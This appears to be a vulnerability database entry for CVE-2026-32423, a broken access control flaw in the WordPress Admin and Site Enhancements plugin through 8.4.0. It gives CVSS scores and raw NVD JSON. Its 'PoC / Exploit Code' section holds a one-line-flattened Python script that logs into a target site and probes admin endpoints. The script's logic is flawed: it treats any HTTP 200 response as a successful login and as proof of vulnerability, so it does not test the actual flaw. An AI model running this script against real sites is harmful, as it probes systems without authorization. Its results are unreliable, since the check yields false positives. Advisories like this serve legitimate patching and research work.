Security Vulnerability Report
中文
CVE-2026-32423 CVSS 5.4 MEDIUM

CVE-2026-32423

Published: 2026-03-13 19:55:00
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Bowo Admin and Site Enhancements (ASE) admin-site-enhancements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Admin and Site Enhancements (ASE): from n/a through <= 8.4.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Admin and Site Enhancements (ASE) plugin <= 8.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urljoin # CVE-2026-32423 PoC - WordPress Admin Site Enhancements Broken Access Control # Target: WordPress site with Admin and Site Enhancements (ASE) plugin <= 8.4.0 def check_vulnerability(target_url, username, password): """ Check if the target WordPress site is vulnerable to CVE-2026-32423 """ session = requests.Session() # WordPress login endpoint login_url = urljoin(target_url, 'wp-login.php') # Login payload login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url, 'testcookie': '1' } # Perform login try: response = session.post(login_url, data=login_data, timeout=10) # Check if login was successful if 'wordpress_logged_in' in str(session.cookies) or response.status_code == 200: print(f'[+] Successfully logged in as {username}') # Try to access ASE admin functionality that should require higher privileges # This is a generic check - specific endpoints may vary admin_endpoints = [ '/wp-admin/admin.php?page=ase_admin_site_enhancements', '/wp-admin/admin-ajax.php', ] for endpoint in admin_endpoints: check_url = urljoin(target_url, endpoint) resp = session.get(check_url, timeout=10) # Check if we can access admin functionality if resp.status_code == 200: print(f'[+] Potentially vulnerable: {check_url} accessible') print(f'[*] Response length: {len(resp.text)} bytes') return True print('[-] Login failed or access check completed') return False except requests.RequestException as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python poc.py <target_url> <username> <password>') print('Example: python poc.py http://example.com/ subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f'[*] Testing CVE-2026-32423 on {target}') is_vulnerable = check_vulnerability(target, user, pwd) if is_vulnerable: print('[+] Target appears to be vulnerable to CVE-2026-32423') else: print('[-] Target does not appear to be vulnerable')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32423", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:00.293", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Bowo Admin and Site Enhancements (ASE) admin-site-enhancements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Admin and Site Enhancements (ASE): from n/a through <= 8.4.0."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Bowo Admin and Site Enhancements (ASE) admin-site-enhancements permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Admin and Site Enhancements (ASE): desde n/a hasta &lt;= 8.4.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/admin-site-enhancements/vulnerability/wordpress-admin-and-site-enhancements-ase-plugin-8-4-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}